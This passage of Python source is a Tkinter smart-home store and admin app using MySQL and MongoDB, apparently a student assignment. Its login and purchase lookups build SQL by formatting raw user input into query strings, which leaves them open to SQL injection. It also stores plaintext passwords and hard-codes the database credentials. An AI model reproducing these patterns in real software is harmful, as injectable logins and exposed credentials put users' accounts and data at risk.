logging import exception\nimport pandas as pd\nimport sqlalchemy as sqa\nimport pymongo as pymgo\nfrom mysqlaccessors import connectTo, executeQuery, readQuery\nfrom recreatemysql import reimportDB\nfrom datetime import datetime, date\nfrom dateutil.relativedelta import relativedelta\nfrom prepopulatemysql import (\n prepopulate_all,\n prepopulate_product,\n prepopulate_user,\n prepopulate_admin,\n)\nfrom warrantytest import setOld\n# Front-end Packages\nfrom tkinter import *\nfrom tkinter import messagebox\nfrom tkinter import ttk\n\nconnection = connectTo(\"localhost\", \"root\", \"password\", \"oshes\")\n\n\n# Misc Packages\nfrom dateutil.relativedelta import relativedelta\nfrom datetime import date\nfrom datetime import datetime\n\n# Connecting to MongoDB\nconnectMongo = pymgo.MongoClient(\"localhost\", 27017)\ndb = connectMongo[\"assignment1\"]\ncollectionProduct = db[\"products\"]\ncollectionItem = db[\"items\"]\n\n#################################################################################\n# BACK END MANAGEMENT SITE\n# Functions to implement\n# 1. user and admin Schemas\n# 2. Products Schemas\n# 3. Service Management Schemas\n#################################################################################\n#################################################################################\n# FRONT END MANAGEMENT SITE\n# 1. Login Page [Done]\n# 2. Home Page [Done]\n# 3.1. Item Listings Page [Done]\n# 3. Product Catalogue [Done]\n# 4. Item Information [Done]\n# 5. Service Management Listings Page [Done]\n# 6. Sign-up Page [Create new user] [Done]\n#################################################################################\n# Browser General Settings\nroot = Tk()\nroot.attributes(\"-fullscreen\", True)\n\n#################################################################################\n# 1. Login Page\n#################################################################################\ndef goToLogin():\n loginPage = Frame(\n root, highlightbackground=\"black\", highlightthickness=1, bg=\"grey\"\n )\n innerFrame = Frame(loginPage, highlightbackground = 'black', highlightthickness = 1)\n\n # Labels\n loginLabel = Label(\n loginPage,\n text=\"Smart Home Administration System\",\n relief=SUNKEN,\n bg=\"orange\",\n )\n loginLabel.place(relwidth=1, relheight=0.05)\n\n loginAsLabel = Label(innerFrame, text=\"Signing in As:\")\n loginAsLabel.place(relx=0.10, rely=0.4)\n\n usernameLabel = Label(innerFrame, text=\"Username: \")\n usernameLabel.place(relx=0.1, rely=0.10)\n\n passwordLabel = Label(innerFrame, text=\"Password: \")\n passwordLabel.place(relx=0.1, rely=0.2)\n\n # Functions\n def ender():\n root.destroy()\n\n def navToSignUp():\n loginPage.destroy()\n goToSignUp()\n\n def clicker():\n userId = userField.get()\n password = passField.get()\n userType = useGroup.get()\n checkerQueue = []\n out = \"Error: Login Credentials do not exist\"\n # customer\n if userType == 0:\n validate_query = (\n \"SELECT * FROM Customer WHERE customerId = '%s' AND password = '%s' \"\n % (userId, password)\n )\n results = readQuery(connection, validate_query)\n for result in results:\n checkerQueue.append(result)\n if len(checkerQueue) == 0:\n return messagebox.showerror(title=\"Error\", message=out)\n elif len(checkerQueue) != 0:\n person = checkerQueue[0]\n loginPage.destroy()\n return userHome(person)\n else:\n userField.delete(0, END)\n messagebox.askokcancel(\"Login Failure\", out)\n # admin\n else:\n validate_query = (\n \"SELECT * FROM Administrator WHERE adminID = '%s' AND password = '%s' \"\n % (userId, password)\n )\n results = readQuery(connection, validate_query)\n for result in results:\n checkerQueue.append(result)\n if len(checkerQueue) == 0:\n return messagebox.showerror(title=\"Error\", message=out)\n elif len(checkerQueue) != 0:\n person = checkerQueue[0]\n loginPage.destroy()\n return adminHome(person)\n else:\n userField.delete(0, END)\n messagebox.askokcancel(\"Login Failure\", out)\n\n # Fields\n userId = IntVar()\n userField = Entry(innerFrame, textvariable=userId, width=50)\n userField.place(relx=0.4, rely=0.10)\n userField.delete(0, END)\n\n passField = Entry(innerFrame, width=50)\n passField.place(relx=0.4, rely=0.2)\n passField.config(show=\"*\")\n\n # Buttons\n loginButton = Button(innerFrame, text=\"Login\", width=50, command=clicker, bg=\"green\")\n loginButton.place(relx=0.2, rely=0.6)\n\n quitButton = Button(\n innerFrame, text=\"End Program\", width=50, command=ender, bg=\"red\"\n )\n quitButton.place(relx=0.2, rely=0.9)\n\n signUpButton = Button(\n innerFrame, text=\"Sign Up\", width=50, command=navToSignUp, bg=\"blue\"\n )\n signUpButton.place(relx=0.2, rely=0.7)\n\n useGroup = IntVar()\n CustomerButton = Radiobutton(\n innerFrame, text=\"Customer\", variable=useGroup, value=0, font=(\"Mincho\", 10)\n )\n CustomerButton.place(relx=0.4, rely=0.4)\n\n AdminButton = Radiobutton(\n innerFrame, text=\"Admin\", variable=useGroup, value=1, font=(\"Mincho\", 10)\n )\n AdminButton.place(relx=0.6, rely=0.4)\n\n # Initialise\n loginPage.place(relwidth=1.0, relheight=1.0)\n innerFrame.place(relwidth = 0.4, relheight = 0.5, relx = 0.3, rely = 0.2)\n\n\n#################################################################################\n# 2. Home Page\n#################################################################################\ndef adminHome(person):\n # Frames\n homePage = Frame(root, bg=\"grey\")\n userInventory = Frame(\n homePage, highlightbackground=\"black\", highlightthickness=1, bg=\"grey\"\n )\n serviceManagementFrame = Frame(\n homePage, highlightbackground=\"black\", highlightthickness=1, bg=\"grey\"\n )\n\n # Labels\n homeLabel = Label(\n homePage,\n text=f\"Welcome, Administrator {person[1]}\",\n bg=\"violet\",\n relief=SUNKEN,\n )\n homeLabel2 = Label(homePage, text=\"Please select the service you wish to use:\")\n inventoryLabel = Label(\n userInventory, text=\"Product Management/Search/Admin Functions\", bg=\"yellow\"\n )\n serviceLabel = Label(\n serviceManagementFrame, text=\"Handle Service requests\", bg=\"yellow\"\n )\n\n homeLabel.place(relwidth=1, relheight=0.05)\n homeLabel2.place(relwidth=1, relheight=0.05, rely=0.05)\n inventoryLabel.place(relwidth=1, relheight=0.2)\n serviceLabel.place(relwidth=1, relheight=0.2)\n\n # Functions\n def servButton():\n homePage.destroy()\n serviceManagement(person)\n\n def logOut():\n homePage.destroy()\n goToLogin()\n\n def stockButton():\n homePage.destroy()\n adminProducts(person)\n\n\n # Buttons\n purchaseButton = Button(\n userInventory, text=\"Product Search\", command=stockButton, width=30, bg=\"green\"\n )\n\n\n serviceButton = Button(\n serviceManagementFrame,\n text=\"Service Management\",\n width=30,\n command=servButton,\n bg=\"green\",\n )\n logOutButton = Button(homePage, text=\"Log out\", width=50, command=logOut, bg=\"blue\")\n\n purchaseButton.place(relx=0.32, rely=0.5)\n serviceButton.place(relx=0.32, rely=0.5)\n logOutButton.place(relx=0.38, rely=0.6)\n\n # Initialise\n homePage.place(relwidth=1.0, relheight=1.0)\n userInventory.place(relwidth=0.4, relheight=0.3, relx=0.05, rely=0.2)\n serviceManagementFrame.place(relwidth=0.4, relheight=0.3, relx=0.55, rely=0.2)\n\n\ndef userHome(person):\n # Frames\n homePage = Frame(root, bg=\"grey\")\n userSearch = Frame(\n homePage, highlightbackground=\"black\", highlightthickness=1, bg=\"grey\"\n )\n requestManagementFrame = Frame(\n homePage, highlightbackground=\"black\", highlightthickness=1, bg=\"grey\"\n )\n\n # Labels\n homeLabel = Label(\n homePage, text=f\"Welcome, User {person[1]} \", bg=\"lightblue\", relief=SUNKEN\n )\n homeLabel2 = Label(homePage, text=\"Please select the service you wish to use:\")\n\n searchLabel = Label(userSearch, text=\"View our products in stock\", bg=\"yellow\")\n\n requestLabel = Label(\n requestManagementFrame,\n text=\"Request Servicing for your owned items\",\n bg=\"yellow\",\n )\n\n homeLabel.place(relwidth=1, relheight=0.05)\n homeLabel2.place(relwidth=1, relheight=0.05, rely=0.05)\n searchLabel.place(relwidth=1, relheight=0.2)\n requestLabel.place(relwidth=1, relheight=0.2)\n\n # Functions\n def goRequest():\n homePage.destroy()\n requestManagement(person)\n\n def goProduct():\n homePage.destroy()\n userProducts(person)\n\n def logOut():\n homePage.destroy()\n goToLogin()\n\n\n # Buttons\n stockCheckButton = Button(\n userSearch,\n text=\"Product Search and Purchase\",\n width=30,\n command=goProduct,\n bg=\"green\",\n )\n requestButton = Button(\n requestManagementFrame,\n text=\"Request Management\",\n width=30,\n command=goRequest,\n bg=\"green\",\n )\n\n logOutButton = Button(homePage, text=\"Log out\", width=50, command=logOut, bg=\"blue\")\n\n stockCheckButton.place(relx=0.32, rely=0.5)\n requestButton.place(relx=0.32, rely=0.5)\n logOutButton.place(relx=0.38, rely=0.6)\n\n # Initialise\n homePage.place(relwidth=1.0, relheight=1.0)\n userSearch.place(relwidth=0.4, relheight=0.3, relx=0.05, rely=0.2)\n requestManagementFrame.place(relwidth=0.4, relheight=0.3, relx=0.55, rely=0.2)\n\n#################################################################################\n# 3.1 Item list page\n#################################################################################\ndef userItemPage(person, allItems, deets):\n validID = []\n\n #Frames\n itemListingsPage = Frame(root, bg = \"dark green\")\n itemTablesPage = Frame(itemListingsPage,\n highlightbackground = \"black\",\n highlightthickness = 1)\n\n # Labels\n titleLabel = Label(\n itemListingsPage, text=\"Item Listing\", relief=SUNKEN, bg=\"lightblue\"\n )\n titleLabel.place(relwidth=1, relheight=0.05)\n\n idSearchBarLabel = Label(itemListingsPage, text = \"Enter item ID: \")\n idSearchBarLabel.place(relx = 0.1, rely = 0.1)\n\n # Functions\n def singleItem():\n id = idSearchBarField.get()\n if id == \"\":\n messagebox.askokcancel(\"No ID detected\", 'Please input ID.')\n elif (id not in validID):\n messagebox.askokcancel(\"Invalid ID\", 'Item does not exist or already sold.')\n else:\n itemListingsPage.destroy()\n goToItem(person, id)\n\n\n def goHome():\n itemListingsPage.destroy()\n userProducts(person)\n \n def clearSearchBar():\n idSearchBarField.delete(0, END)\n\n def select_record(e):\n # delete current entry boxes\n clearSearchBar()\n selected = table.focus()\n attrs = table.item(selected)[\"values\"]\n\n idSearchBarField.insert(0, attrs[0])\n\n\n # Fields\n idSearchBarField = Entry(itemListingsPage, width=100)\n idSearchBarField.place(relx=0.25, rely=0.1)\n idSearchBarField.delete(0, END)\n\n # Buttons\n homeButton = Button(\n itemListingsPage,\n text=\"Return to Products\",\n width=20,\n command=goHome,\n bg=\"red\"\n )\n homeButton.place(relx=0.1, rely=0.2)\n\n descriptionButton = Button(itemListingsPage,\n text = \"Details\",\n width = 20,\n bg = \"blue\",\n command = singleItem)\n descriptionButton.place(relx = 0.7, rely = 0.1)\n\n # Tables\n colNames = [\"ID\", \"Category\", \"Model\", \"Sale Status\"]\n table = ttk.Treeview(itemTablesPage,\n column = colNames,\n show = \"headings\",\n height = 10,\n selectmode ='browse')\n verscrlbar = ttk.Scrollbar(itemTablesPage,\n orient=\"vertical\",\n command=table.yview)\n table.configure(yscrollcommand=verscrlbar.set)\n verscrlbar.pack(side=RIGHT, fill=Y)\n\n\n table.bind(\"\", select_record)\n\n theModel = deets[0]\n theCategory = deets[1]\n for item in allItems:\n if item[\"Category\"] == theCategory and item[\"Model\"] == theModel:\n validID.append(item[\"ItemID\"])\n toInsert = (\n item[\"ItemID\"],\n item[\"Category\"],\n item[\"Model\"],\n item[\"PurchaseStatus\"],\n )\n table.insert(\"\", \"end\", text=str(item), values=toInsert)\n for name in colNames:\n table.heading(name, text=name, anchor=CENTER)\n\n\n\n table.place(relwidth = 1, relheight = 1)\n\n # Initialise\n itemListingsPage.place(relwidth = 1, relheight = 1)\n itemTablesPage.place(relwidth = 1, relheight = 0.7, rely = 0.3)\n \ndef adminItemPage(person, allItems, deets):\n validID = []\n #Frames\n itemListingsPage = Frame(root, bg = \"dark green\")\n itemTablesPage = Frame(itemListingsPage,\n highlightbackground = \"black\",\n highlightthickness = 1)\n\n # Labels\n titleLabel = Label(\n itemListingsPage, text=\"Item Listing\", relief=SUNKEN, bg=\"violet\"\n )\n titleLabel.place(relwidth=1, relheight=0.05)\n\n idSearchBarLabel = Label(itemListingsPage, text = \"Enter item ID: \")\n idSearchBarLabel.place(relx = 0.1, rely = 0.1)\n\n # Functions\n def singleItem():\n id = idSearchBarField.get()\n if id == \"\":\n messagebox.askokcancel(\"No ID detected\", 'Please input ID.')\n elif (id not in validID):\n messagebox.askokcancel(\"Invalid ID\", 'Item does not exist.')\n else:\n itemListingsPage.destroy()\n goToItem(person, id, True)\n\n def goHome():\n itemListingsPage.destroy()\n adminProducts(person)\n\n def clearSearchBar():\n idSearchBarField.delete(0,END)\n\n def select_record(e):\n # delete current entry boxes\n clearSearchBar()\n selected = table.focus()\n attrs = table.item(selected)[\"values\"]\n\n idSearchBarField.insert(0, attrs[0])\n\n # Fields\n idSearchBarField = Entry(itemListingsPage, width=100)\n idSearchBarField.place(relx=0.25, rely=0.1)\n idSearchBarField.delete(0, END)\n\n # Buttons\n homeButton = Button(\n itemListingsPage,\n text=\"Return to Products\",\n width=20,\n command=goHome,\n bg=\"red\"\n )\n homeButton.place(relx=0.1, rely=0.2)\n\n descriptionButton = Button(itemListingsPage,\n text = \"Details\",\n width = 20,\n bg = \"blue\",\n command = singleItem)\n descriptionButton.place(relx = 0.7, rely = 0.1)\n\n # Tables\n colNames = [\"ID\", \"Category\", \"Model\", \"Sale Status\"]\n table = ttk.Treeview(itemTablesPage,\n column = colNames,\n show = \"headings\",\n height = 10,\n selectmode ='browse')\n verscrlbar = ttk.Scrollbar(itemTablesPage,\n orient=\"vertical\",\n command=table.yview)\n table.configure(yscrollcommand=verscrlbar.set)\n verscrlbar.pack(side=RIGHT, fill=Y)\n\n table.bind(\"\", select_record)\n\n theModel = deets[0]\n theCategory = deets[1]\n\n for item in allItems:\n if item[\"Category\"] == theCategory and item[\"Model\"] == theModel:\n validID.append(item[\"ItemID\"])\n toInsert = (\n item[\"ItemID\"],\n item[\"Category\"],\n item[\"Model\"],\n item[\"PurchaseStatus\"],\n )\n table.insert(\"\", \"end\", text=str(item), values=toInsert)\n for name in colNames:\n table.heading(name, text=name, anchor=CENTER)\n\n\n\n table.place(relwidth = 1, relheight = 1)\n\n # Initialise\n itemListingsPage.place(relwidth = 1, relheight = 1)\n itemTablesPage.place(relwidth = 1, relheight = 0.7, rely = 0.3)\n \n#################################################################################\n# 3. Product Catalogue [Search page and listings]\n# list all products\n# search button\n# note: Remember to update MongoDB with the new JSON files Dr Danny Poo Uploaded\n#################################################################################\ndef userProducts(person):\n # Frames\n userProductPage = Frame(root)\n global listFrame\n searchFrame = Frame(\n userProductPage, highlightbackground=\"black\", highlightthickness=1, bg=\"grey\"\n )\n listFrame = Frame(\n userProductPage, highlightbackground=\"black\", highlightthickness=1\n )\n inventoryFrame = Frame(userProductPage, highlightbackground = \"black\", highlightthickness= 1)\n\n # Search inner Frames\n categoryFrame = Frame(searchFrame, highlightbackground = \"black\",highlightthickness= 1)\n modelFrame = Frame(searchFrame, highlightbackground=\"black\",highlightthickness= 1)\n filterFrame = Frame(searchFrame, highlightbackground = \"black\",highlightthickness= 1)\n\n # Labels\n instructionLabel = Label(searchFrame, text = \"Double Click a row under Product Listings to see items\",\n fg = 'white', bg = 'grey', font = ('arial', 12))\n instructionLabel.place(relx = 0.05, rely = 0.65)\n\n productLabel = Label(\n userProductPage, text=\"Product Page\", relief=SUNKEN, bg=\"lightblue\"\n )\n productLabel.place(relwidth=1, relheight=0.05)\n\n listTitleLabel = Label(userProductPage, text=\"Listings\", relief=SUNKEN, bg=\"pink\")\n listTitleLabel.place(relheight = 0.05, relwidth = 0.7, relx = 0.3, rely = 0.05)\n\n priceLimitLabel = Label(filterFrame, text=\"Maximum Price\")\n priceLimitLabel.place(relx=0.05, rely=0.2)\n\n colourLabel = Label(filterFrame, text=\"Colour\")\n colourLabel.place(relx=0.05, rely=0.4)\n\n factoryLabel = Label(filterFrame, text=\"Factory\")\n factoryLabel.place(relx=0.05, rely=0.6)\n\n yearLabel = Label(filterFrame, text=\"Year\")\n yearLabel.place(relx=0.05, rely=0.8)\n\n categoryLabel = Label(categoryFrame, text=\"Category\", relief=SUNKEN, bg=\"yellow\")\n categoryLabel.place(relheight = 0.3, relwidth = 1)\n\n modelLabel = Label(modelFrame, text=\"Model\", relief=SUNKEN, bg=\"yellow\")\n modelLabel.place(relheight = 0.1, relwidth = 1)\n\n yourInventoryLabel = Label(inventoryFrame, text = \"Your Inventory\", relief=SUNKEN, bg=\"orange\")\n yourInventoryLabel.place(relheight = 0.1, relwidth = 1)\n\n filterLabel =Label(filterFrame, text = \"Filter\", relief=SUNKEN, bg=\"yellow\")\n filterLabel.place(relheight=0.15, relwidth=1)\n\n # Tables\n detailNames = ['ItemID', 'Color', 'Factory', 'PowerSupply', 'ProductionYear', 'Model','Service Status']\n myInventoryTable = ttk.Treeview(inventoryFrame, column=detailNames, show=\"headings\", height=5)\n for name in detailNames:\n myInventoryTable.heading(name, text=name, anchor=CENTER)\n myInventoryTable.column(name, anchor=CENTER, stretch=NO, width=150)\n test_query = \"SELECT * FROM Purchase WHERE customerID = '%s' \" % (person[0])\n results = readQuery(connection, test_query)\n if results != []:\n for item in results:\n test_query2 = \"SELECT * FROM Item WHERE purchaseID = '%s' \" % (item[0])\n mydetails = readQuery(connection, test_query2)[0]\n myInventoryTable.insert(\"\",\"end\",text=str(item), values=(int(mydetails[0]),) + mydetails[1:4] + (int(mydetails[4]), mydetails[5], mydetails[6]))\n\n myInventoryTable.place(relheight = 0.9, relwidth = 1, rely = 0.1)\n\n # Functions\n def searchTings():\n selected = example.get()\n selectedPrice = priceField.get()\n if selectedPrice != \"\":\n selectedPrice = int(priceField.get())\n\n if selected == \"Search by...\":\n # Never specify search filter, display all unsold items\n cats = [lightVar.get(), locksVar.get()]\n sql = collectionItem.find({\"PurchaseStatus\": \"Unsold\"})\n createTable(sql, selectedPrice)\n # messagebox.askokcancel(\"Search Error\", \"Please input a Category\")\n elif selected == \"Category\":\n cats = [lightVar.get(), locksVar.get()]\n selectedColor = colourBox.get()\n selectedFactory = factoryBox.get()\n selectedYear = yearBox.get()\n # if selectedYear != \"\":\n # selectedYear = int(selectedYear)\n\n selections = [selectedColor, selectedFactory, selectedYear]\n selectionsSQL = [\n {\"Color\": selectedColor},\n {\"Factory\": selectedFactory},\n {\"ProductionYear\": selectedYear},\n ]\n and_query_arr = [\n {\"$or\": [{\"Category\": cats[0]}, {\"Category\": cats[1]}]},\n {\"PurchaseStatus\": \"Unsold\"},\n ]\n and_query_arr = and_query_arr + [\n selectionsSQL[i] for i in range(len(selections)) if selections[i] != \"\"\n ]\n sql = collectionItem.find({\"$and\": and_query_arr})\n createTable(sql, selectedPrice)\n\n elif selected == \"Model\":\n models = [\n light1Var.get(),\n light2Var.get(),\n safe1Var.get(),\n safe2Var.get(),\n safe3Var.get(),\n smartHome1Var.get(),\n ]\n selectedColor = colourBox.get()\n selectedFactory = factoryBox.get()\n selectedYear = yearBox.get()\n\n selections = [selectedColor, selectedFactory, selectedYear]\n selectionsSQL = [\n {\"Color\": selectedColor},\n {\"Factory\": selectedFactory},\n {\"ProductionYear\": selectedYear},\n ]\n and_query_arr = [\n {\n \"$or\": [\n {\"Model\": models[0]},\n {\"Model\": models[1]},\n {\"Model\": models[2]},\n {\"Model\": models[3]},\n {\"Model\": models[4]},\n {\"Model\": models[5]},\n ]\n },\n {\"PurchaseStatus\": \"Unsold\"},\n ]\n and_query_arr = and_query_arr + [\n selectionsSQL[i] for i in range(len(selections)) if selections[i] != \"\"\n ]\n sql = collectionItem.find({\"$and\": and_query_arr})\n createTable(sql, selectedPrice)\n\n else:\n messagebox.askokcancel(\"Search Error\", \"No such product\")\n\n def createTable(items, selectedPrice):\n allItems = []\n global listFrame\n listFrame.destroy()\n listFrame = Frame(\n userProductPage, highlightbackground=\"black\", highlightthickness=1\n )\n sql = \"\"\n categoryValues = []\n modelValues = []\n categoryModel = [\n \"LightsLight1\",\n \"LightsLight2\",\n \"LightsSmartHome1\",\n \"LocksSafe1\",\n \"LocksSafe2\",\n \"LocksSafe3\",\n \"LocksSmartHome1\",\n ]\n instockValues = [0, 0, 0, 0, 0, 0, 0]\n\n for item in items:\n allItems.append(item)\n index = 0\n categoryModelPair = item[\"Category\"] + item[\"Model\"]\n\n index = categoryModel.index(categoryModelPair)\n\n if item[\"Category\"] not in categoryValues:\n categoryValues.append(item[\"Category\"])\n if item[\"Model\"] not in modelValues:\n modelValues.append(item[\"Model\"])\n instockValues[index] = instockValues[index] + 1\n else:\n instockValues[index] = instockValues[index] + 1\n\n numModels = len(modelValues)\n # Test if there is value in category and model\n oneCat = False\n # Test if theres 2 catorgoires i.e user never select category\n twoCat = False\n try:\n numCat = len(categoryValues)\n if numCat == 2:\n twoCat = True\n oneCat = True\n except:\n print(\"No value on either category or model\")\n print(len(categoryValues))\n print(len(modelValues))\n\n if twoCat:\n if selectedPrice == \"\":\n sql = collectionProduct.find(\n {\n \"$or\": [\n {\n \"$and\": [\n {\"Model\": modelValue},\n ]\n }\n for modelValue in modelValues\n ]\n }\n )\n\n else:\n sql = collectionProduct.find(\n {\n \"$or\": [\n {\n \"$and\": [\n {\"Model\": modelValue},\n {\"Price ($)\": {\"$lte\": selectedPrice}},\n ]\n }\n for modelValue in modelValues\n ]\n }\n )\n\n elif oneCat:\n\n if selectedPrice == \"\":\n sql = collectionProduct.find(\n {\n \"$or\": [\n {\n \"$and\": [\n {\"Category\": categoryValues[0]},\n {\"Model\": modelValue},\n ]\n }\n for modelValue in modelValues\n ]\n }\n )\n else:\n sql = collectionProduct.find(\n {\n \"$or\": [\n {\n \"$and\": [\n {\"Category\": categoryValues[0]},\n {\"Model\": modelValue},\n {\"Price ($)\": {\"$lte\": selectedPrice}},\n ]\n }\n for modelValue in modelValues\n ]\n }\n )\n\n columnNames = (\n \"Category\",\n \"Model\",\n \"Price ($)\",\n \"Warranty (months)\",\n \"In Stock\",\n )\n \n table = ttk.Treeview(listFrame, column=columnNames, show=\"headings\", height=10)\n for name in columnNames:\n table.heading(name, text=name, anchor=CENTER)\n\n for item in sql:\n categoryModelPair = item[\"Category\"] + item[\"Model\"]\n toInsert = (\n item[\"Category\"],\n item[\"Model\"],\n item[\"Price ($)\"],\n item[\"Warranty (months)\"],\n instockValues[categoryModel.index(categoryModelPair)],\n )\n table.insert(\"\", \"end\", text=str(item), values=toInsert)\n\n table.place(relwidth=1, relheight=1)\n listFrame.place(relwidth=0.7, relheight=0.6, relx=0.3, rely=0.1)\n\n #Binding Click\n def clicking(e):\n selected = table.focus()\n theCategory = table.set(selected, 'Model')\n theModel = table.set(selected, 'Category')\n\n userProductPage.destroy()\n userItemPage(person, allItems, [theCategory, theModel])\n\n\n #Binding\n table.bind(\"\", clicking)\n\n def goHome():\n userProductPage.destroy()\n userHome(person)\n\n # Fields\n priceValues = [\"\", \"50\", \"70\", \"100\", \"120\", \"200\"]\n priceField = ttk.Combobox(filterFrame, values=priceValues)\n priceField.place(relx=0.5, rely=0.2)\n\n # Combobox\n example = ttk.Combobox(searchFrame, values=[\"Search by...\", \"Category\", \"Model\"])\n example.current(0)\n example.place(relx=0.05, rely=0.70)\n\n colourValues = []\n colourValues.append(\"\")\n factoryValues = []\n factoryValues.append(\"\")\n yearValues = []\n yearValues.append(\"\")\n all = collectionItem.find()\n for item in all:\n if item[\"Color\"] not in colourValues:\n colourValues.append(item[\"Color\"])\n if item[\"Factory\"] not in factoryValues:\n factoryValues.append(item[\"Factory\"])\n if item[\"ProductionYear\"] not in yearValues:\n yearValues.append(item[\"ProductionYear\"])\n colourBox = ttk.Combobox(filterFrame, values=colourValues)\n factoryBox = ttk.Combobox(filterFrame, values=factoryValues)\n yearBox = ttk.Combobox(filterFrame, values=yearValues)\n\n colourBox.place(relx=0.5, rely=0.4)\n factoryBox.place(relx=0.5, rely=0.6)\n yearBox.place(relx=0.5, rely=0.8)\n\n # Checkboxes for Category\n lightVar = StringVar()\n locksVar = StringVar()\n\n lightBox = Checkbutton(\n categoryFrame, text=\"Lights\", variable=lightVar, onvalue=\"Lights\", offvalue=\"\"\n )\n locksBox = Checkbutton(\n categoryFrame, text=\"Locks\", variable=locksVar, onvalue=\"Locks\", offvalue=\"\"\n )\n\n lightBox.place(relx=0.1, rely=0.4)\n locksBox.place(relx=0.5, rely=0.4)\n\n # Checkboxes for Models\n light1Var = StringVar()\n light2Var = StringVar()\n safe1Var = StringVar()\n safe2Var = StringVar()\n safe3Var = StringVar()\n smartHome1Var = StringVar()\n\n light1Box = Checkbutton(\n modelFrame, text=\"Light 1\", variable=light1Var, onvalue=\"Light1\", offvalue=\"\"\n )\n light2Box = Checkbutton(\n modelFrame, text=\"Light 2\", variable=light2Var, onvalue=\"Light2\", offvalue=\"\"\n )\n safe1Box = Checkbutton(\n modelFrame, text=\"Safe 1\", variable=safe1Var, onvalue=\"Safe1\", offvalue=\"\"\n )\n safe2Box = Checkbutton(\n modelFrame, text=\"Safe 2\", variable=safe2Var, onvalue=\"Safe2\", offvalue=\"\"\n )\n safe3Box = Checkbutton(\n modelFrame, text=\"Safe 3\", variable=safe3Var, onvalue=\"Safe3\", offvalue=\"\"\n )\n smartHome1Box = Checkbutton(\n modelFrame,\n text=\"Smart Home 1\",\n variable=smartHome1Var,\n onvalue=\"SmartHome1\",\n offvalue=\"\",\n )\n\n light1Box.place(relx=0.1, rely=0.35)\n light2Box.place(relx=0.4, rely=0.35)\n safe1Box.place(relx=0.7, rely=0.35)\n safe2Box.place(relx=0.1, rely=0.6)\n safe3Box.place(relx=0.4, rely=0.6)\n smartHome1Box.place(relx=0.7, rely=0.6)\n\n # Buttons\n searchButton = Button(\n searchFrame,\n text=\"Search\",\n width=10,\n height=3,\n command=lambda: searchTings(),\n bg=\"green\",\n )\n homeButton = Button(\n searchFrame, text=\"Return to Home\", width=30, command=goHome, bg=\"red\"\n )\n searchButton.place(relx=0.75, rely=0.7)\n homeButton.place(relx=0.2, rely=0.9)\n\n # Initialise\n userProductPage.place(relwidth=1, relheight=1)\n searchFrame.place(relwidth=0.3, relheight=0.95, relx=0, rely=0.05)\n listFrame.place(relwidth=0.7, relheight=0.6, relx=0.3, rely=0.1)\n inventoryFrame.place(relwidth=0.7, relheight=0.3, relx=0.3, rely=0.7)\n categoryFrame.place(rely = 0.2, relx= 0.05, relwidth = 0.9, relheight = 0.1)\n modelFrame.place(rely = 0.35, relx=0.05, relwidth=0.9, relheight=0.25)\n filterFrame.place(relx = 0.05, rely = 0.02, relwidth = 0.9, relheight = 0.15)\n\n\ndef adminProducts(person):\n # Frames\n adminProductPage = Frame(root)\n global listFrame\n searchFrame = Frame(\n adminProductPage, highlightbackground=\"black\", highlightthickness=1, bg=\"grey\"\n )\n listFrame = Frame(\n adminProductPage, highlightbackground=\"black\", highlightthickness=1\n )\n\n # Search inner Frames\n categoryFrame = Frame(searchFrame, highlightbackground = \"black\",highlightthickness= 1)\n modelFrame = Frame(searchFrame, highlightbackground=\"black\",highlightthickness= 1)\n filterFrame = Frame(searchFrame, highlightbackground = \"black\",highlightthickness= 1)\n\n # Labels\n instructionLabel = Label(searchFrame, text = \"Double Click a row under Product Listings to see items\",\n fg = 'white', bg = 'grey', font = ('arial', 12))\n instructionLabel.place(relx = 0.05, rely = 0.65)\n productLabel = Label(\n adminProductPage, text=\"Product Page\", relief=SUNKEN, bg=\"violet\"\n )\n productLabel.place(relwidth=1, relheight=0.05)\n\n listTitleLabel = Label(adminProductPage, text=\"Listings\", relief=SUNKEN, bg=\"pink\")\n listTitleLabel.place(relheight = 0.05, relwidth = 0.7, relx = 0.3, rely = 0.05)\n\n priceLimitLabel = Label(filterFrame, text=\"Maximum Price\")\n priceLimitLabel.place(relx=0.05, rely=0.2)\n\n colourLabel = Label(filterFrame, text=\"Colour\")\n colourLabel.place(relx=0.05, rely=0.4)\n\n factoryLabel = Label(filterFrame, text=\"Factory\")\n factoryLabel.place(relx=0.05, rely=0.6)\n\n yearLabel = Label(filterFrame, text=\"Year\")\n yearLabel.place(relx=0.05, rely=0.8)\n\n categoryLabel = Label(categoryFrame, text=\"Category\", relief=SUNKEN, bg=\"yellow\")\n categoryLabel.place(relheight=0.3, relwidth=1)\n\n modelLabel = Label(modelFrame, text=\"Model\", relief=SUNKEN, bg=\"yellow\")\n modelLabel.place(relheight=0.1, relwidth=1)\n\n filterLabel = Label(filterFrame, text=\"Filter\", relief=SUNKEN, bg=\"yellow\")\n filterLabel.place(relheight=0.15, relwidth=1)\n\n def searchTings():\n selected = example.get()\n selectedPrice = priceField.get()\n if selectedPrice != \"\":\n selectedPrice = int(priceField.get())\n\n if selected == \"Search by...\":\n # Never specify search filter, display all unsold items\n cats = [lightVar.get(), locksVar.get()]\n sql = collectionItem.find({})\n createTable(sql, selectedPrice)\n # messagebox.askokcancel(\"Search Error\", \"Please input a Category\")\n elif selected == \"Category\":\n cats = [lightVar.get(), locksVar.get()]\n selectedColor = colourBox.get()\n selectedFactory = factoryBox.get()\n selectedYear = yearBox.get()\n\n selections = [selectedColor, selectedFactory, selectedYear]\n selectionsSQL = [\n {\"Color\": selectedColor},\n {\"Factory\": selectedFactory},\n {\"ProductionYear\": selectedYear},\n ]\n and_query_arr = [\n {\"$or\": [{\"Category\": cats[0]}, {\"Category\": cats[1]}]}\n ]\n and_query_arr = and_query_arr + [\n selectionsSQL[i] for i in range(len(selections)) if selections[i] != \"\"\n ]\n sql = collectionItem.find({\"$and\": and_query_arr})\n\n createTable(sql, selectedPrice)\n\n elif selected == \"Model\":\n models = [\n light1Var.get(),\n light2Var.get(),\n safe1Var.get(),\n safe2Var.get(),\n safe3Var.get(),\n smartHome1Var.get(),\n ]\n selectedColor = colourBox.get()\n selectedFactory = factoryBox.get()\n selectedYear = yearBox.get()\n\n selections = [selectedColor, selectedFactory, selectedYear]\n selectionsSQL = [\n {\"Color\": selectedColor},\n {\"Factory\": selectedFactory},\n {\"ProductionYear\": selectedYear},\n ]\n and_query_arr = [\n {\n \"$or\": [\n {\"Model\": models[0]},\n {\"Model\": models[1]},\n {\"Model\": models[2]},\n {\"Model\": models[3]},\n {\"Model\": models[4]},\n {\"Model\": models[5]},\n ]\n }\n ]\n and_query_arr = and_query_arr + [\n selectionsSQL[i] for i in range(len(selections)) if selections[i] != \"\"\n ]\n sql = 